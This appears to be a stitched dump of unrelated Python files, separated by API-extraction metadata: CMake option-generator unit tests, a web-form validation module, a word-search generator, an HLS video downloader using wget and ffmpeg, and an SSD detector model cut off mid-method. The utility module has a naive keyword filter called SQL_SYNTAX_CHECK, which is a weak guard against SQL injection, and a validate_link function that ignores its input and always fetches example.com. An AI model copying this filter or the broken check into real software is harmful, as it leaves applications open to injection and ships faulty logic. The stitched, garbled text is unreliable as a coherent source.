print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_cmake_fragment(self):
"""
Test the ``gen_option_list`` method using the ``cmake_fragment`` generator.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TRILINOS_CONFIGURATION_ALPHA"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
print("-" * 40)
print("Option List")
print("-" * 40)
option_list_expect = [
'set(Trilinos_ENABLE_COMPLEX ON CACHE BOOL "from .ini configuration")',
'set(Trilinos_ENABLE_THREAD_SAFE ON CACHE BOOL "from .ini configuration")',
'set(Trilinos_PARALLEL_COMPILE_JOBS_LIMIT 20)',
'set(Trilinos_PARALLEL_LINK_JOBS_LIMIT 4)',
'set(Trilinos_ENABLE_Kokkos ON CACHE BOOL "from .ini configuration")',
'set(Trilinos_ENABLE_KokkosCore ON CACHE BOOL "from .ini configuration")',
'set(Trilinos_ENABLE_KokkosKernels ON CACHE BOOL "from .ini configuration")',
'set(KokkosKernels_ENABLE_EXAMPLES ON CACHE BOOL "from .ini configuration")',
'set(Trilinos_ENABLE_Tpetra ON CACHE BOOL "from .ini configuration")',
'set(Tpetra_INST_DOUBLE ON CACHE BOOL "from .ini configuration")'
]
option_list_actual = parser.gen_option_list(section, generator="cmake_fragment")
pprint(option_list_actual, width=200)
self.assertListEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_cmake_fragment_expandvars(self):
"""
Test the ``gen_option_list`` method using the ``bash`` generator.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_02"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
parser.gen_option_list(section, generator="cmake_fragment")
option_list_expect = [
'set(CMAKE_CXX_FLAGS "$ENV{LDFLAGS} -foo" CACHE STRING "from .ini configuration")',
'set(CMAKE_F90_FLAGS "${CMAKE_F90_FLAGS} -baz" CACHE STRING "from .ini configuration")'
]
option_list_actual = parser.gen_option_list(section, generator="cmake_fragment")
print("Expected Output:\n{}\n".format("\n".join(option_list_expect)))
print("Actual Output:\n{}\n".format("\n".join(option_list_actual)))
self.assertListEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
# Test that the CMake generator will generate a sequence of operations
# that don't include a FORCE option on an update of an existing CACHE
# value. As far as SPOCM is concerned, it'll generate the CMake as
# defined in the .ini file.
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_01"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
parser.gen_option_list(section, generator="cmake_fragment")
option_list_expect = [
'set(CMAKE_CXX_FLAGS "$ENV{LDFLAGS} -foo" CACHE STRING "from .ini configuration")',
'set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -bar" CACHE STRING "from .ini configuration")',
]
option_list_actual = parser.gen_option_list(section, generator="cmake_fragment")
print("Expected Output:\n{}\n".format("\n".join(option_list_expect)))
print("Actual Output:\n{}\n".format("\n".join(option_list_actual)))
self.assertListEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
# Test that the CMake generator will generate a sequence of operations
# that do include a FORCE option on an update of an existing CACHE
# value. As far as SPOCM is concerned w/rt to CMake fragments, we will
# generate what the .ini file tells us to do and respect that the CMake
# engine will operate as the CMake engine does.
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_03"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
parser.gen_option_list(section, generator="cmake_fragment")
option_list_expect = [
# Sets CMAKE_CXX_FLAGS the _first_ time, CMAKE_CXX_FLAGS would be set.
'set(CMAKE_CXX_FLAGS "$ENV{LDFLAGS} -foo" CACHE STRING "from .ini configuration")',
# Tries to update CMAKE_CXX_FLAGS the _second_ time without FORCE.
# CMake will not save this.
'set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -bar" CACHE STRING "from .ini configuration")',
# Tries to update CMAKE_CXX_FLAGS again but this time uses FORCE.
# CMake will save this updated value.
'set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -bif" CACHE STRING "from .ini configuration" FORCE)',
]
option_list_actual = parser.gen_option_list(section, generator="cmake_fragment")
print("Expected Output:\n{}\n".format("\n".join(option_list_expect)))
print("Actual Output:\n{}\n".format("\n".join(option_list_actual)))
self.assertListEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_param_order_01(self):
"""
"""
parser = self._create_standard_parser()
section = "TEST_CMAKE_CACHE_PARAM_ORDER"
print("Section : {}".format(section))
self._execute_parser(parser, section)
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_bash_expect = [
'-DCMAKE_VAR_A:STRING="ON"',
'-DCMAKE_VAR_C:BOOL=ON',
'-DCMAKE_VAR_D:BOOL=ON',
'-DCMAKE_VAR_E:BOOL=ON',
]
option_list_bash_actual = parser.gen_option_list(section, generator="bash")
self.assertListEqual(option_list_bash_expect, option_list_bash_actual)
option_list_cmake_fragment_expect = [
'set(CMAKE_VAR_A ON CACHE STRING "from .ini configuration" FORCE)',
'set(CMAKE_VAR_B ON PARENT_SCOPE)',
'set(CMAKE_VAR_C ON CACHE BOOL "from .ini configuration")',
'set(CMAKE_VAR_D ON CACHE BOOL "from .ini configuration" FORCE)',
'set(CMAKE_VAR_E ON CACHE BOOL "from .ini configuration" FORCE)',
'set(CMAKE_VAR_F ON CACHE BOOL "from .ini configuration" PARENT_SCOPE)',
'set(CMAKE_VAR_G ON CACHE BOOL "from .ini configuration" PARENT_SCOPE)',
]
option_list_cmake_fragment_actual = parser.gen_option_list(section, generator="cmake_fragment")
self.assertListEqual(option_list_cmake_fragment_expect, option_list_cmake_fragment_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_param_order_02(self):
"""
Tests that we correctly generate output if extra flags
are provided such as something to uniqueify a .ini option entry.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_CMAKE_CACHE_PARAM_TEST_02"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
option_list_bash_expect = ['-DCMAKE_VAR_A:STRING="ON"']
option_list_bash_actual = parser.gen_option_list(section, generator="bash")
self.assertListEqual(option_list_bash_expect, option_list_bash_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_bash_generator_ignores_PARENT_SCOPE(self):
"""
Verify that the bash generator will not add a ``-D`` entry for a
``opt-set-cmake-var`` that has the ``PARENT_SCOPE`` flag since that
will always force CMake to create a type-1 (non-cache) var assignment.
"""
parser = self._create_standard_parser()
section = "TEST_CMAKE_PARENT_SCOPE_NOT_BASH"
print("Section : {}".format(section))
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_bash_expect = []
option_list_bash_actual = parser.gen_option_list(section, generator="bash")
self.assertListEqual(option_list_bash_expect, option_list_bash_actual)
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_cmake_fragment_expect = [
'set(FOO_VAR_A "FOO_VAL A" PARENT_SCOPE)',
'set(FOO_VAR_B "FOO_VAL B" CACHE STRING "from .ini configuration" PARENT_SCOPE)'
]
option_list_cmake_fragment_actual = parser.gen_option_list(section, generator="cmake_fragment")
self.assertListEqual(option_list_cmake_fragment_expect, option_list_cmake_fragment_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_fail_on_FORCE_and_PARENT_SCOPE(self):
"""
Tests the case that both PARENT_SCOPE and FORCE are provided.
This will cause a CMake error beacuse the existence of PARENT_SCOPE
forces CMake to use a Type-1 set operation, i.e. a NON-CACHEd
variable. However ``FORCE`` is only valid for a CACHED variable (Type-2).
These two options are mutually exclusive and CMake will fail.
In this case SetProgramOptionsCMake should raise a CATASTROPHIC
error because the operation provided is invalid.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_CMAKE_FAIL_ON_PARENT_SCOPE_AND_FORCE"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
with self.assertRaises(ValueError):
parser.gen_option_list(section, generator="bash")
print("-----[ TEST END ]------------------------------------------")
print("OK")
return
def test_SetProgramOptionsCMake_test_STRING_value_surrounded_by_double_quotes(self):
"""
Test STRING values are surrounded by double quotes.
"""
print("\n")
print("Load file: {}".format(self._filename))
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_STRING_DOUBLE_QUOTES"
print("Section : {}".format(section))
option_list_expect = ['-DFOO:STRING="foo::bar::baz<Type>"', '-DBAR:STRING="600"']
option_list_actual = parser.gen_option_list(section, generator="bash")
print("-" * 40)
print("Options List Expect")
print("-" * 40)
pprint(option_list_expect, width=120)
print("")
print("Options List Actual")
print("-" * 40)
pprint(option_list_actual, width=120)
self.assertEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_opt_remove(self):
"""
This test validates that `opt-remove` will correctly remove a CMake var
that was created using `opt-set-cmake-var`
"""
parser = self._create_standard_parser()
section = "TEST_CMAKE_VAR_REMOVE"
print("Section : {}".format(section))
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_bash_actual = parser.gen_option_list(section, 'bash')
option_list_bash_expect = ['-DBAR_TEST:STRING="BAR"', '-DBAZ_TEST:STRING="BAZ"']
self.assertListEqual(option_list_bash_expect, option_list_bash_actual)
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_cmake_fragment_actual = parser.gen_option_list(section, 'cmake_fragment')
option_list_cmake_fragment_expect = [
'set(BAR_TEST BAR CACHE STRING "from .ini configuration")',
'set(BAZ_TEST BAZ CACHE STRING "from .ini configuration")'
]
self.assertListEqual(option_list_cmake_fragment_expect, option_list_cmake_fragment_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_FORCE_only_for_bash(self):
"""
Test that an ``opt-set-cmake-var`` that has a FORCE but does
not specify a TYPE will be assigned STRING by default and will
generate the appropriate ``-D`` entry.
[TEST_CMAKE_VAR_FORCE_ONLY]
opt-set-cmake-var FOO FORCE : "BAR"
should generate:
-DFOO:STRING="BAR"
"""
parser = self._create_standard_parser()
section = "TEST_CMAKE_VAR_FORCE_ONLY"
print("Section : {}".format(section))
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_bash_actual = parser.gen_option_list(section, 'bash')
option_list_bash_expect = [
'-DFOO:STRING="BAR"',
]
self.assertListEqual(option_list_bash_expect, option_list_bash_actual)
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_cmake_fragment_actual = parser.gen_option_list(section, 'cmake_fragment')
option_list_cmake_fragment_expect = [
'set(FOO BAR CACHE STRING "from .ini configuration" FORCE)',
]
self.assertListEqual(option_list_cmake_fragment_expect, option_list_cmake_fragment_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_bash_unresolved_cmake_var_01(self):
"""
Tests what we do with an unresolved cmake variable encountered in the
bash generator. The hitch is that if we replace the unresolved cmake
var with an empty string we may be allowing a ``cmake-fragment`` and a
``bash command`` to diverge sicne the cmake fragment would have additional
context of pre-existing variables that *might exist* versus the bash command
where a cmake variable *definitely will not exist*.
"""
parser = self._create_standard_parser()
section = "TEST_CMAKE_VAR_IN_BASH_GENERATOR"
print("Section : {}".format(section))
print("-----[ TEST BEGIN ]----------------------------------------")
# Test 1: Validate exception is raised when `exception_control_level`
# is the default (4).
with self.assertRaises(ValueError):
option_list_actual = parser.gen_option_list(section, generator='bash')
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
# Test 2: Reduce the `exception_control_level` so that the exception is
# not generated.
# - Sets `exception_control_level` to 3
# - Sets `exception_control_compact_warnings` to False
# Note: This test is sensitive to formatting changes to `ExceptionControl`
# if this is a big problem we may need to change this in the future
# to be less sensitive to stdout.
option_list_expect = [
'-DFOO_VAR:STRING="FOO"',
'-DFOO_VAR:STRING="BAR "'
]
parser.exception_control_level = 3
parser.exception_control_compact_warnings = False
with io.StringIO() as m_stdout:
with contextlib.redirect_stdout(m_stdout):
option_list_actual = parser.gen_option_list(section, generator='bash')
# Check that the output matches
self.assertListEqual(option_list_expect, option_list_actual)
# Check that the exception-control warning message gets printed
self.assertIn("EXCEPTION SKIPPED", m_stdout.getvalue())
self.assertIn("Event Type : MINOR", m_stdout.getvalue())
self.assertIn("Exception : ValueError", m_stdout.getvalue())
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
# Test 2: Repeat the previous test but with *compact* warnings from
# `exception_control_compact_warnings` set to True to enable
# compact warnings.
# - Sets `exception_control_level` to 3
# - Sets `exception_control_compact_warnings` to True
# Note: This test is sensitive to formatting changes to `ExceptionControl`
# if this is a big problem we may need to change this in the future
# to be less sensitive to stdout.
option_list_expect = [
'-DFOO_VAR:STRING="FOO"',
'-DFOO_VAR:STRING="BAR "'
]
parser.exception_control_level = 3
parser.exception_control_compact_warnings = True
with io.StringIO() as m_stdout:
with contextlib.redirect_stdout(m_stdout):
option_list_actual = parser.gen_option_list(section, generator='bash')
# Check that the output matches
self.assertListEqual(option_list_expect, option_list_actual)
# Check that the exception-control warning message gets printed
self.assertIn("EXCEPTION SKIPPED", m_stdout.getvalue())
self.assertIn("(MINOR : ValueError)", m_stdout.getvalue())
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def _create_standard_parser(
self, filename=DEFAULT_VALUE(), debug_level=5, ece_level=4, ece_compact=False
):
if isinstance(filename, DEFAULT_VALUE):
filename = self._filename
output = None
if filename is not None:
print("\n")
print("filename: {}".format(filename))
output = SetProgramOptionsCMake(filename)
else:
output = SetProgramOptionsCMake()
output.debug_level = debug_level
output.exception_control_level = ece_level
output.exception_control_compact_warnings = ece_compact
return output
def _execute_parser(self, parser, section):
output = None
# parse a section
print("-" * 40)
print("Execute Parser")
print("-" * 40)
output = parser.parse_section(section)
# pretty print the output
print("-" * 40)
print("Output")
print("-" * 40)
pprint(output, width=120)
# pretty print the loginfo
print("-" * 40)
print("LogInfo")
print("-" * 40)
parser._loginfo_print()
return output
| [
"contextlib.redirect_stdout",
"os.path.realpath",
"os.path.dirname",
"os.path.basename",
"os.path.abspath",
"io.StringIO",
"pprint.pprint"
] | [((4147, 4173), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (4163, 4173), False, 'import os\n'), ((4204, 4236), 'os.path.basename', 'os.path.basename', (['unit_test_path'], {}), '(unit_test_path)\n', (4220, 4236), False, 'import os\n'), ((4267, 4298), 'os.path.dirname', 'os.path.dirname', (['unit_test_path'], {}), '(unit_test_path)\n', (4282, 4298), False, 'import os\n'), ((7024, 7061), 'pprint.pprint', 'pprint', (['option_list_actual'], {'width': '(200)'}), '(option_list_actual, width=200)\n', (7030, 7061), False, 'from pprint import pprint\n'), ((8034, 8071), 'pprint.pprint', 'pprint', (['option_list_actual'], {'width': '(200)'}), '(option_list_actual, width=200)\n', (8040, 8071), False, 'from pprint import pprint\n'), ((8861, 8898), 'pprint.pprint', 'pprint', (['option_list_actual'], {'width': '(200)'}), '(option_list_actual, width=200)\n', (8867, 8898), False, 'from pprint import pprint\n'), ((12820, 12857), 'pprint.pprint', 'pprint', (['option_list_actual'], {'width': '(200)'}), '(option_list_actual, width=200)\n', (12826, 12857), False, 'from pprint import pprint\n'), ((23512, 23549), 'pprint.pprint', 'pprint', (['option_list_expect'], {'width': '(120)'}), '(option_list_expect, width=120)\n', (23518, 23549), False, 'from pprint import pprint\n'), ((23637, 23674), 'pprint.pprint', 'pprint', (['option_list_actual'], {'width': '(120)'}), '(option_list_actual, width=120)\n', (23643, 23674), False, 'from pprint import pprint\n'), ((31667, 31692), 'pprint.pprint', 'pprint', (['output'], {'width': '(120)'}), '(output, width=120)\n', (31673, 31692), False, 'from pprint import pprint\n'), ((2189, 2214), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (2204, 2214), False, 'import os\n'), ((28537, 28550), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (28548, 28550), False, 'import io\n'), ((30049, 30062), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (30060, 30062), False, 'import io\n'), ((28581, 28617), 'contextlib.redirect_stdout', 'contextlib.redirect_stdout', (['m_stdout'], {}), '(m_stdout)\n', (28607, 28617), False, 'import contextlib\n'), ((30093, 30129), 'contextlib.redirect_stdout', 'contextlib.redirect_stdout', (['m_stdout'], {}), '(m_stdout)\n', (30119, 30129), False, 'import contextlib\n')] |
import random
import string
import requests
def SQL_SYNTAX_CHECK(input: str) -> bool:
bad_char = ['*',';','SELECT ',' FROM ', ' TRUE ', ' WHERE ']
for char in bad_char:
if char in input:
return False
return True
def validateRegistration(name, uname, email, password, confirm):
if len(name) < 1 or len(name) > 45:
return "Error invalid name"
if len(uname) < 1 or len(uname) > 20:
return "Error invalid username"
if len(email) < 1 or len(email) > 100:
return "Error invalid email"
if len(password) < 1:
return "Error invalid password"
if password != confirm:
return "Error passwords do not match"
return "Success"
def validate_email(email: str):
at_counter = 0
for x in email:
if x == "@":
at_counter+=1
if at_counter == 1:
return True
else:
return False
def validate_link(link: str):
req = requests.get('http://www.example.com')
if req.status_code == 200:
return True
else:
return False
def generate_link() -> str:
letters = string.ascii_lowercase+string.ascii_uppercase+"0123456789"
return (''.join(random.choice(letters) for i in range(10))) | [
"random.choice",
"requests.get"
] | [((964, 1002), 'requests.get', 'requests.get', (['"""http://www.example.com"""'], {}), "('http://www.example.com')\n", (976, 1002), False, 'import requests\n'), ((1207, 1229), 'random.choice', 'random.choice', (['letters'], {}), '(letters)\n', (1220, 1229), False, 'import random\n')] |
from random import choice, randint
import os
def generate_grid(w, h):
global width, height
alphabet = 'qwertyuiopasdfghjklzxcvbnm'
grid = []
for i in range(h):
row = []
for j in range(w):
row.append(' ')
grid.append(row)
return grid
def populate_grid(words, grid):
for word in words:
done = False
tries = 10
while not done:
try:
start_x = randint(0, len(grid[0]) - len(word))
start_y = randint(0, len(grid) - len(word))
vel = choice([(1, 0), (0, 1), (1, 1)])
except ValueError:
done = True
break
valid_spot = True
x, y = start_x, start_y
for i in range(len(word)):
if grid[y][x] == ' ' or grid[y][x] == word[i]:
pass
else:
valid_spot = False
tries -= 1
break
x += vel[0]
y += vel[1]
if tries <= 0:
done = True
if valid_spot:
x, y = start_x, start_y
for i in range(len(word)):
grid[y][x] = word[i].upper()
x += vel[0]
y += vel[1]
done = True
alphabet = 'qwertyuiopasdfghjklzxcvbnm'.upper()
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == ' ':
grid[i][j] = choice(alphabet)
return grid
def draw_grid(grid):
screen = ''
for row in grid:
screen += '\n'
do_once = True
for tile in row:
if do_once:
screen += '|'
do_once = False
screen += tile + '|'
print(screen)
def use_random():
path = 'words.txt'
if os.path.exists(path):
with open(path, 'r') as file:
temp = file.readlines()
class wrd():
def __init__(self, word):
self.word = word
self.index = randint(0, 1000)
def __lt__(self, other):
return self.index < other.index
words = []
word_count = 5
for word in temp:
w = word.replace('\n', '')
words.append(wrd(w))
words.sort()
temp = []
for i in range(word_count):
temp.append(words[i].word)
return temp
def get_details():
# width
while True:
w = input('\nWhat is the width of the grid in characters?\n[>> ')
if w.isdigit():
w = int(w)
break
# height
while True:
h = input('\nWhat is the height of the grid in characters?\n[>> ')
if h.isdigit():
h = int(h)
break
# words
words = []
while True:
wrd = input('Please add the words to the bank, you can press ENTER to use random words and press "q" when you\'re finished.\n[>> ').strip().lower()
if wrd == '':
words = use_random()
break
if wrd == 'q':
break
for let in wrd:
if let not in 'qwertyuiopasdfghjklzxcvbnm':
print('Invalid word, words can only contain the following letters:', ''.join(i for i in sorted('qwertyuiopasdfghjklzxcvbnm')))
break
else:
words.append(wrd)
return w, h, words
def clear():
print('\n' * 50)
width, height, words = get_details()
while True:
grid = generate_grid(width, height)
grid = populate_grid(words, grid)
clear()
draw_grid(grid)
input('>')
| [
"os.path.exists",
"random.choice",
"random.randint"
] | [((2009, 2029), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2023, 2029), False, 'import os\n'), ((600, 632), 'random.choice', 'choice', (['[(1, 0), (0, 1), (1, 1)]'], {}), '([(1, 0), (0, 1), (1, 1)])\n', (606, 632), False, 'from random import choice, randint\n'), ((1621, 1637), 'random.choice', 'choice', (['alphabet'], {}), '(alphabet)\n', (1627, 1637), False, 'from random import choice, randint\n'), ((2246, 2262), 'random.randint', 'randint', (['(0)', '(1000)'], {}), '(0, 1000)\n', (2253, 2262), False, 'from random import choice, randint\n')] |
import sys, os, asyncio, shutil
import wget
from ffmpeg import FFmpeg
# Func calls wget to download the file given in url arg
def webget(url):
wget.download(url)
# Fuc calls ffmpeg to transcode .m3u8 to .mp4
def transcode(ffmpeg):
@ffmpeg.on('stderr')
def on_stderr(line):
print(line)
@ffmpeg.on('progress')
def on_progress(progress):
print(progress)
@ffmpeg.on('completed')
def on_completed():
print('\nCompleted')
@ffmpeg.on('error')
def on_error(code):
print('Error:', code)
loop = asyncio.get_event_loop()
loop.run_until_complete(ffmpeg.execute())
loop.close()
def parse_m3u8_url(input_url):
parse_url = input_url.split('/')
input_m3u8 = parse_url[len(parse_url) - 1]
base_url = input_url[:-len(input_m3u8)]
if '?' in input_m3u8:
input_m3u8 = input_m3u8.split('?')[0]
return base_url, input_m3u8
def create_manifest(input_m3u8):
with open(f'./{input_m3u8}', 'r') as f:
file = f.readlines()
manifest = []
for el in file:
el = el[:-1]
if 'http' in el and '?' in el and '=' in el:
manifest.append(el)
elif 'https' in el:
el = el.split('/')
el = el[len(el)-1]
manifest.append(el)
else:
manifest.append(el)
with open('./manifest.m3u8', 'a') as f:
for elm in manifest:
f.write(elm+'\n')
def cleanup_working_dir(input_m3u8, storage_folder):
try:
# Create folder given in arg
os.mkdir(storage_folder)
except FileExistsError:
print('\nWARNING: Output folder exists')
cwd = os.getcwd()
files = os.listdir()
print(f'\nMESSAGE: Cleaning up and Packaging things nicely')
os.mkdir(f'{storage_folder}/{storage_folder}')
for f in files:
# Logic for moving the output file
if f[-3:] == 'mp4':
original = f'{cwd}/{f}'
target = f'{cwd}/{storage_folder}'
# Moving the output file
print(f'\nMESSAGE: Moving {input_m3u8} to {storage_folder}')
shutil.move(original,target)
if f[-4:] == 'm3u8':
original = f'{os.getcwd()}/{f}'
target = f'{os.getcwd()}/{storage_folder}/{storage_folder}'
shutil.move(original,target)
if f[-2:] == 'ts':
original = f'{os.getcwd()}/{f}'
target = f'{os.getcwd()}/{storage_folder}/{storage_folder}'
shutil.move(original,target)
# Read cli args : 'hls-downloader.py ["m3u8_url"] ["mp4_output_name"] ["storage_folder"]'
input_url = sys.argv[1]
output_filename = sys.argv[2]
storage_folder = "./site/media"
base_url, input_m3u8 = parse_m3u8_url(input_url)
# Call wget to download files
if input_m3u8 in os.listdir():
print(f'WARNING: {input_m3u8} already exists')
else:
print(f'MESSAGE: Downloading m3u8 file')
webget(input_url)
print(f'\nMESSAGE: Creating manifest.m3u8')
create_manifest(input_m3u8)
print(f'\nMESSAGE: Reading {input_m3u8}')
data = None
if 'movcloud' in input_url:
with open('playlist.m3u8', 'r') as f:
data = f.read()
elif 'manifest.m3u8' in os.listdir():
with open('manifest.m3u8', 'r') as f:
data = f.read()
if data != None:
contents = data.split('\n')
print(f'\nMESSAGE: Attempting to download items from {input_m3u8}')
for item in contents:
if item in os.listdir():
continue
if 'http' in item and '?' in item and '=' in item:
webget(item)
if 'movcloud' in item:
item_sp = item.split('/')
if item_sp[len(item_sp)-1] in os.listdir():
continue
else:
webget(item)
else:
stxt = item[0:5]
entxt = item[-2:]
if stxt == 'https':
l = item.split('/')
name = item[len(l)-1]
webget(item)
elif entxt == 'ts':
cut = slice(0,-len(input_m3u8))
webget(input_url[cut] + item)
# Configuring ffmpeg
## ffmpeg -i "./folder/file.m3u8" -c copy file.mp4
_ffmpeg = FFmpeg().option('n').input('./manifest.m3u8').output(output_filename,{'c': 'copy'})
print(f'\n\nMESSAGE: Running command: ffmpeg -i ./manifest.m3u8 -c copy {output_filename}')
transcode(_ffmpeg)
cleanup_working_dir(input_m3u8, storage_folder)
| [
"wget.download",
"os.listdir",
"shutil.move",
"os.getcwd",
"os.mkdir",
"asyncio.get_event_loop",
"ffmpeg.FFmpeg"
] | [((148, 166), 'wget.download', 'wget.download', (['url'], {}), '(url)\n', (161, 166), False, 'import wget\n'), ((563, 587), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (585, 587), False, 'import sys, os, asyncio, shutil\n'), ((1669, 1680), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1678, 1680), False, 'import sys, os, asyncio, shutil\n'), ((1693, 1705), 'os.listdir', 'os.listdir', ([], {}), '()\n', (1703, 1705), False, 'import sys, os, asyncio, shutil\n'), ((1776, 1822), 'os.mkdir', 'os.mkdir', (['f"""{storage_folder}/{storage_folder}"""'], {}), "(f'{storage_folder}/{storage_folder}')\n", (1784, 1822), False, 'import sys, os, asyncio, shutil\n'), ((2798, 2810), 'os.listdir', 'os.listdir', ([], {}), '()\n', (2808, 2810), False, 'import sys, os, asyncio, shutil\n'), ((1555, 1579), 'os.mkdir', 'os.mkdir', (['storage_folder'], {}), '(storage_folder)\n', (1563, 1579), False, 'import sys, os, asyncio, shutil\n'), ((3186, 3198), 'os.listdir', 'os.listdir', ([], {}), '()\n', (3196, 3198), False, 'import sys, os, asyncio, shutil\n'), ((2121, 2150), 'shutil.move', 'shutil.move', (['original', 'target'], {}), '(original, target)\n', (2132, 2150), False, 'import sys, os, asyncio, shutil\n'), ((2308, 2337), 'shutil.move', 'shutil.move', (['original', 'target'], {}), '(original, target)\n', (2319, 2337), False, 'import sys, os, asyncio, shutil\n'), ((2493, 2522), 'shutil.move', 'shutil.move', (['original', 'target'], {}), '(original, target)\n', (2504, 2522), False, 'import sys, os, asyncio, shutil\n'), ((3433, 3445), 'os.listdir', 'os.listdir', ([], {}), '()\n', (3443, 3445), False, 'import sys, os, asyncio, shutil\n'), ((3666, 3678), 'os.listdir', 'os.listdir', ([], {}), '()\n', (3676, 3678), False, 'import sys, os, asyncio, shutil\n'), ((2206, 2217), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2215, 2217), False, 'import sys, os, asyncio, shutil\n'), ((2248, 2259), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2257, 2259), False, 'import sys, os, asyncio, shutil\n'), ((2391, 2402), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2400, 2402), False, 'import sys, os, asyncio, shutil\n'), ((2433, 2444), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2442, 2444), False, 'import sys, os, asyncio, shutil\n'), ((4171, 4179), 'ffmpeg.FFmpeg', 'FFmpeg', ([], {}), '()\n', (4177, 4179), False, 'from ffmpeg import FFmpeg\n')] |
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from detector.ssd.utils import box_utils
from nn.separable_conv_2d import SeparableConv2d
from fpn.extension import Extension
from detector.ssd.to_predictions import ToPredictions
class SSD(nn.Module):
def __init__(self, num_classes, backbone, arch_name,
batch_size=None, config=None):
"""Compose a SSD model using the given components.
"""
super(SSD, self).__init__()
self.num_classes = num_classes
self.backbone = backbone
self.arch_name = arch_name
self.batch_size = batch_size # to ease the inference model
feature_channels = self.backbone.feature_channels()
self.extras = Extension(
bootstrap_channels=feature_channels[-1],
out_channels=[512, 256, 256, 64],
conv=SeparableConv2d)
self.classification_headers = nn.ModuleList([
SeparableConv2d(in_channels=feature_channels[-2],
out_channels=6 * num_classes,
kernel_size=3, padding=1),
SeparableConv2d(in_channels=feature_channels[-1],
out_channels=6 * num_classes,
kernel_size=3, padding=1),
SeparableConv2d(in_channels=512, out_channels=6 * num_classes,
kernel_size=3, padding=1),
SeparableConv2d(in_channels=256, out_channels=6 * num_classes,
kernel_size=3, padding=1),
SeparableConv2d(in_channels=256, out_channels=6 * num_classes,
kernel_size=3, padding=1),
nn.Conv2d(in_channels=64, out_channels=6 * num_classes,
kernel_size=1),
])
self.regression_headers = nn.ModuleList([
SeparableConv2d(in_channels=feature_channels[-2],
out_channels=6 * 4,
kernel_size=3, padding=1, onnx_compatible=False),
SeparableConv2d(in_channels=feature_channels[-1],
out_channels=6 * 4, kernel_size=3,
padding=1, onnx_compatible=False),
SeparableConv2d(in_channels=512, out_channels=6 * 4, kernel_size=3,
padding=1, onnx_compatible=False),
SeparableConv2d(in_channels=256, out_channels=6 * 4, kernel_size=3,
padding=1, onnx_compatible=False),
SeparableConv2d(in_channels=256, out_channels=6 * 4, kernel_size=3,
padding=1, onnx_compatible=False),
nn.Conv2d(in_channels=64, out_channels=6 * 4, kernel_size=1),
])
self.config = config
def forward(self, x):
confidences = []
locations = []
cs = self.backbone.forward(x)
cs = cs[-2:]
for i, c in enumerate(cs):
confidence, location = self.compute_header(i, c)
x = c
confidences.append(confidence)
locations.append(location)
extra_x = self.extras.forward(x)
header_index = i + 1
for ex in extra_x:
confidence, location = self.compute_header(header_index, ex)
header_index += 1
confidences.append(confidence)
locations.append(location)
confidences = torch.cat(confidences, 1)
locations = torch.cat(locations, 1)
